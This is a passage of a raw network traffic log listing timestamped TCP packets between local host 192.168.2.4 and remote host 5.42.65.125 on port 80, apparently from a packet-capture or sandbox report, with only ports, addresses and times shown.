Dec 27, 2023 18:12:25.092705011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092715979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092732906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.092736006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092742920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.092749119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092786074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.095621109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095660925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095673084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095696926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.095721006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095733881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095753908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.095762968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095774889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095787048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095794916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.095799923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095820904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.095834017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095868111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095901966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.095923901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095936060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095954895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.095961094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095973015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.095992088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.095994949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096007109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096025944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.096792936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096806049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096817017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096826077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.096828938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096839905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096851110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096852064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.096862078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096873045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096874952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.096884966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096896887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096898079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.096919060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096921921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.096931934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.096951008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.097724915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097738028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097748995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097759008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.097759962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097783089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.097853899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097866058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097877026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097888947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097893953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.097901106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097912073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097923994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097923994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.097935915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.097944975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.097954035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.098848104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.098880053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.098887920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.098900080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.098912001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.098942995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.099039078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.099050999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.099061966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.099071026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.099073887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.099085093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.099093914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.099097013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.099108934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.099122047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.099123955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.099139929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.099617004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.099687099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.099720001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.120384932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120397091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120409012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120419979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120431900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120443106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120450974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.120455027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120466948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120474100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.120477915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120491028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120495081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.120502949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120508909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.120516062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.120552063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.121097088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121131897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121144056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121155024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121165991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121174097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.121176958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121187925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.121189117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121202946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.121205091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121217012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121227026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.121228933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121242046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121249914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.121253967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121289015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.121752024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121763945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121795893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121804953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.121833086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.121922970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121936083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121948004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121958971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121967077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.121970892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121982098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.121993065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.121994019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122006893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122011900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.122019053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122052908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.122606039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122617960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122631073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122646093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.122673035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.122720957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122733116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122773886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.122831106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122915030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122926950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122937918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122950077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122960091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.122961044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122973919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.122982979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.122999907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.123559952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.123589993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.123634100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.123652935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.123665094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.123676062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.123684883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.123687029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.123701096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.123713017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.123734951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.123738050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.123747110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.123759031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.123778105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.123791933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.123806953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.123881102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124439001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124453068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124496937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.124635935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124649048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124660015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124671936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124675035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.124701977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.124808073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124820948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124831915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124842882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124850988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.124854088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124866962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124876976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.124880075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124891996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.124895096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.124922991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.125504017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125587940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125601053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125612020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125623941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125623941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.125637054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125657082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.125672102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.125720978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125732899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125744104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125755072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125766039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125768900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.125777960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.125785112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.125799894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.126498938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126509905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126522064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126533031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126533985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.126544952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126557112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126559019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.126569033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126583099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.126605988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.126638889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126652002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126662970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126674891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126684904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.126687050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.126713037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.127434015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127446890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127458096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127469063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.127470970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127484083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127495050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.127506971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127520084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.127525091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127537012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127548933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127559900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127567053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.127571106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127592087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.127603054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.127614975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.127615929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128329992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128357887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128370047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128371000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.128382921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128405094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.128420115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.128448963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128462076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128473997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128485918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128508091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.128528118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.128568888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128582001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128593922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128606081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128613949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.128618002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128631115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.128643990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.128676891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.129412889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129426003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129437923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129448891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129461050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129463911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.129489899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129498959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.129502058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129515886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129528046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129535913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.129539967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129553080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129558086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.129580021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.129595995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129610062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.129641056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.130392075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130403996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130417109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130428076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130435944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.130459070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.130481958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130495071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130506992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130518913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130531073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.130546093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.130557060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130568981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130580902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130593061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.130604029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.130605936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131297112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131310940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131325960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.131325960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.131336927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131351948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.131360054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131371975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131397963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.131405115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131417990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131429911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131437063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.131462097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.131469965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131481886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131493092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.131521940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.132265091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132277012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132287979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132299900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132307053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.132312059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132322073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.132325888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132339001 CET	80	49738	5.42.65.125	192.168.2.4
